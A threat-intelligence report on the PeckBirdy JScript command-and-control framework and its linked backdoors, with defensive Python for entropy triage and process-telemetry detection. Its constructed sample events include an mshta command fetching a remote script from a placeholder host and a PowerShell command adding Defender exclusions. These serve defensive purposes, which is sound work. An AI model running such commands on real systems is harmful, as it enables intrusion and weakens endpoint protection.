
China Nexus Threat Actors Use PeckBirdy C2 Framework

Written by The Hivemind | Feb 2, 2026 6:43:12 PM

Verticals Targeted: Gambling, Government
Regions Targeted: China, Philippines, Broader Asia
Related Families: HOLODONUT, MKDOOR

Executive Summary

Researchers have identified PeckBirdy, a versatile JScript-based C2 framework, deployed since 2023 in campaigns linked to China-aligned APT actors. This framework supports multiple execution environments via living-off-the-land binaries and delivers modular backdoors in operations targeting gambling operations and government entities.

Key Takeaways

  • PeckBirdy operates as a flexible script framework using JScript for compatibility across browsers, MSHTA, WScript, and other environments, enabling roles from watering-hole delivery to reverse shells and persistent C2.
  • Two campaigns were observed: SHADOW-VOID-044 targeting Chinese gambling sites with social engineering for backdoor installation, and SHADOW-EARTH-045 focusing on Asian government and private entities for credential harvesting and lateral movement.
  • Associated backdoors include HOLODONUT and MKDOOR.

What is PeckBirdy?

Since 2023, security researchers have monitored threat operations employing PeckBirdy, a previously undocumented script-based command-and-control framework written in JScript. That language choice lets the same code run under a range of living-off-the-land binaries (LOLBins) and script hosts, including browsers, MSHTA, WScript, Classic ASP, Node.js, and .NET ScriptControl. PeckBirdy adapts its capabilities to the execution context: inside a browser it is sandboxed and limited to a narrow set of actions, whereas under MSHTA and similar hosts it gains more direct system access. Trend Micro reported on this activity.

In observed activities, PeckBirdy appears in multiple attack phases. In watering-hole scenarios, malicious scripts injected into websites trigger downloads of the main PeckBirdy script upon victim visitation, often leading to fake software update pages that prompt execution of malicious files. One campaign, SHADOW-VOID-044, beginning in 2023, focused on Chinese gambling websites, using PeckBirdy to deliver social engineering lures and backdoors. A later campaign, SHADOW-EARTH-045, from July 2024, targeted Asian government entities and private organizations, injecting PeckBirdy links into government sites for credential theft or employing MSHTA for lateral movement in compromised networks.

The framework's server exposes APIs from which clients retrieve an environment-specific landing script keyed by an ATTACK_ID. Embedded configuration controls the server domain, ports, retry intervals, and heartbeat timing. Execution-context detection relies on objects that exist only in a given host, after which PeckBirdy generates a victim ID: a hash of hardware attributes where the host allows local system access, or a random string otherwise.

Communication defaults to WebSocket, falling back to Flash ActiveX TCP sockets or HTTP-based Comet/LocalComet methods. Initial requests include domain, URL, victim ID, ATTACK_ID, and session ID; responses deliver second-stage scripts with AES-encrypted and Base64-encoded payloads. Delivered scripts observed include CVE-2020-16040 exploitation for Chrome, social engineering pop-ups, Electron JS backdoor delivery, and TCP reverse shell establishment.
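The report notes that second-stage scripts arrive as AES-encrypted, Base64-encoded payloads. A practical consequence for defenders is that such responses look very different from ordinary JScript once the Base64 wrapper is removed: the decoded bytes are close to uniformly distributed. The following is an added triage example written for this report (it is not PeckBirdy code and not PolySwarm tooling) that decodes long Base64 runs in captured response bodies and flags those whose decoded content has ciphertext-like entropy. The regex length floor, entropy threshold, minimum blob length, and every sample body are constructed assumptions; the AES key is never needed because the check works on the ciphertext itself.

```python
"""Triage helper for script responses that wrap an opaque, encrypted-looking blob.

Added example for this report; it is not PeckBirdy code and not PolySwarm tooling.
Assumes the defender has HTTP response bodies (from a proxy or PCAP extraction) and
wants to separate ordinary JScript from responses whose payload is Base64-wrapped
ciphertext. Entropy threshold, blob-length floor and all sample bodies are constructed
assumptions for the example.
"""
import base64
import binascii
import hashlib
import math
import re
from typing import List, Tuple

# A run of Base64 alphabet long enough to be a payload rather than a short token.
# The 64-character floor is an assumption chosen for this example.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
ENTROPY_THRESHOLD = 7.0   # bits per byte; ciphertext and compressed data sit near 8.0
MIN_BLOB_LEN = 48         # ignore decoded blobs too short for a meaningful estimate


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def extract_blobs(body: str) -> List[bytes]:
    """Decode every long Base64 run in the body; skip runs that are not valid Base64."""
    blobs = []
    for match in B64_RUN.finditer(body):
        try:
            blobs.append(base64.b64decode(match.group(0), validate=True))
        except (binascii.Error, ValueError):
            continue
    return blobs


def classify_response(body: str) -> Tuple[str, float]:
    """Return ('suspect' | 'plain', highest entropy seen among the decoded blobs)."""
    highest = 0.0
    for blob in extract_blobs(body):
        if len(blob) >= MIN_BLOB_LEN:
            highest = max(highest, shannon_entropy(blob))
    return ("suspect" if highest >= ENTROPY_THRESHOLD else "plain", highest)


def _pseudo_random_bytes(n: int, seed: bytes = b"constructed-sample") -> bytes:
    """Deterministic stand-in for ciphertext (SHA-256 chain) so the sample is reproducible."""
    out, block = b"", seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


# Constructed sample bodies, not captures from any real campaign.
SAMPLE_PLAIN = (
    "function heartbeat(){ var x = new ActiveXObject('WScript.Shell'); "
    "x.Run('cmd /c echo ping'); } setInterval(heartbeat, 60000);"
)
SAMPLE_WRAPPED_TEXT = "eval(atob('" + base64.b64encode(
    b"var cfg = {host: 'c2.example.invalid', port: 443, retry: 30}; " * 4).decode() + "'))"
SAMPLE_ENCRYPTED = "eval(decrypt('" + base64.b64encode(_pseudo_random_bytes(1024)).decode() + "'))"


if __name__ == "__main__":
    for name, body in [("plain", SAMPLE_PLAIN), ("wrapped text", SAMPLE_WRAPPED_TEXT),
                       ("encrypted", SAMPLE_ENCRYPTED)]:
        verdict, ent = classify_response(body)
        print(f"{name:13s} -> {verdict:7s} (max blob entropy {ent:.2f} bits/byte)")
```

The decode step is what makes the check useful: raw Base64 text already scores around 6 bits per character whether it wraps plaintext or ciphertext, so measuring the encoded string would flag harmless obfuscation as well. Measuring the decoded bytes separates Base64-wrapped plaintext (the second sample stays "plain") from an encrypted second stage (the third sample is "suspect"). Treat the verdict as a triage signal to pull the response for analysis, not as a block decision on its own, since compressed assets score high too.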

Two modular backdoors link to SHADOW-VOID-044 infrastructure. HOLODONUT, a .NET backdoor, is deployed by the NEXLOAD downloader. It employs AMSI/ETW bypass and Donut for in-memory execution, and supports plugin handling alongside built-in commands for information collection, sleep, and exit. MKDOOR comprises a downloader and a backdoor module. The downloader fetches the module from C2, adds Microsoft Defender exclusions so the module is not scanned, and disguises its traffic as Microsoft support/activation pages. The backdoor supports module install/uninstall/execute, status feedback, sleep, and exit commands.
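Two of the behaviours described on this page are visible in ordinary endpoint telemetry: a script host such as MSHTA or WScript being handed remote script content (often straight from a browser after a fake update page), and MKDOOR's downloader adding Defender exclusions. The following is an added detection example written for this report, not PeckBirdy, HOLODONUT or MKDOOR code and not PolySwarm tooling. It assumes process-creation events exported as JSON lines with Image, ParentImage and CommandLine fields (the field names follow the Sysmon process-creation event; the sample records, hostnames, paths and URL are constructed placeholders, not IoCs), and the heuristics themselves are this example's assumptions.

```python
"""Process-creation triage for script-host LOLBins and Defender exclusion changes.

Added example for this report; it is not PeckBirdy, HOLODONUT or MKDOOR code and not
PolySwarm tooling. It assumes endpoint telemetry exported as JSON lines with Image,
ParentImage and CommandLine fields (field names follow the Sysmon process-creation
event; the sample records below are constructed). The heuristics cover the two
behaviours the report describes: a script host (MSHTA/WScript) running remote or
inline script content, typically after a browser hand-off, and a process adding
Microsoft Defender exclusions.
"""
import json
from typing import Dict, List, Tuple

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_event(event: Dict[str, str]) -> List[str]:
    """Return the findings for one process-creation record (empty if nothing matched)."""
    findings: List[str] = []
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "").lower()

    if image in SCRIPT_HOSTS:
        # Script host pointed at a URL or an inline protocol handler rather than a local file.
        if any(marker in cmd for marker in ("http://", "https://", "javascript:", "vbscript:")):
            findings.append(f"{image} launched with remote or inline script content")
        # Browser -> script host matches the fake-update / watering-hole hand-off.
        if parent in BROWSERS:
            findings.append(f"{image} spawned directly by browser {parent}")

    # Exclusion changes weaken Defender coverage; legitimate ones should be rare and known.
    if image in SHELLS and "add-mppreference" in cmd and "-exclusion" in cmd:
        findings.append("Defender exclusion added via Add-MpPreference")

    return findings


def triage_log(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Parse JSON lines and return (image, findings) for every record that raised a finding."""
    flagged = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed telemetry line; skip it rather than abort the sweep
        findings = triage_event(event)
        if findings:
            flagged.append((_basename(event.get("Image", "")), findings))
    return flagged


# Constructed sample telemetry (hostnames, paths and the URL are placeholders, not real IoCs).
SAMPLE_EVENTS = [
    json.dumps({"EventID": 1, "Image": "C:\\Windows\\System32\\mshta.exe",
                "ParentImage": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
                "CommandLine": "mshta.exe https://update.example.invalid/landing.hta"}),
    json.dumps({"EventID": 1, "Image": "C:\\Windows\\System32\\svchost.exe",
                "ParentImage": "C:\\Windows\\System32\\services.exe",
                "CommandLine": "svchost.exe -k netsvcs"}),
    json.dumps({"EventID": 1, "Image": "C:\\Windows\\System32\\wscript.exe",
                "ParentImage": "C:\\Windows\\explorer.exe",
                "CommandLine": "wscript.exe C:\\Tools\\backup.js"}),
    json.dumps({"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                "ParentImage": "C:\\Windows\\System32\\cmd.exe",
                "CommandLine": "powershell.exe -c \"Add-MpPreference -ExclusionPath C:\\ProgramData\\svc\""}),
    json.dumps({"EventID": 1, "Image": "C:\\Windows\\System32\\wscript.exe",
                "ParentImage": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe",
                "CommandLine": "wscript.exe //E:jscript C:\\Users\\user\\Downloads\\update.js"}),
]


if __name__ == "__main__":
    for image, findings in triage_log(SAMPLE_EVENTS):
        print(image, "->", "; ".join(findings))
```

Three of the five constructed records are flagged: the browser-spawned mshta.exe with a URL (two findings), the PowerShell exclusion change, and the browser-spawned wscript.exe. The explorer-launched wscript.exe running a local file is deliberately not flagged, which illustrates the limit of command-line heuristics against the report's point that PeckBirdy generates code at runtime and leaves minimal persistence: pair these rules with Defender's own configuration-change events and with the file hashes in the IOC section rather than relying on any one signal.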

Attribution connects SHADOW-VOID-044 to UNC3569 via GRAYRABBIT backdoor overlaps and to TheWizard via HOLODONUT and WizardNet ties. Additional links include Cobalt Strike samples and BIOPASS RAT techniques, potentially associating the activity with Earth Lusca. SHADOW-EARTH-045 shows low-confidence ties to Earth Baxia via infrastructure overlaps in Philippine and African incidents. These operations demonstrate China-aligned actors' increasing reliance on dynamic, script-based frameworks that run through LOLBins, which complicates detection because code is generated at runtime and little is left on disk for persistence.

IOCs

PolySwarm has multiple samples of PeckBirdy.


336a0be2dfa60e6beee133cff185bc258b480fb231d5d7eacaca6dfde0db3f81

74a73e1461dffcf445f195cede0204f44afef8c4b6f37391a0c314e20ed8f7b7

691d3a5ea614b5bf371001941635788e680ad938f06ee4dfd25768422eaedd6f

ef67e340d31cbc7bd0d5f77581801142b25b0bc636bb97c04e4ed3c757532227


Click here to view all samples of PeckBirdy in our PolySwarm portal.


Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.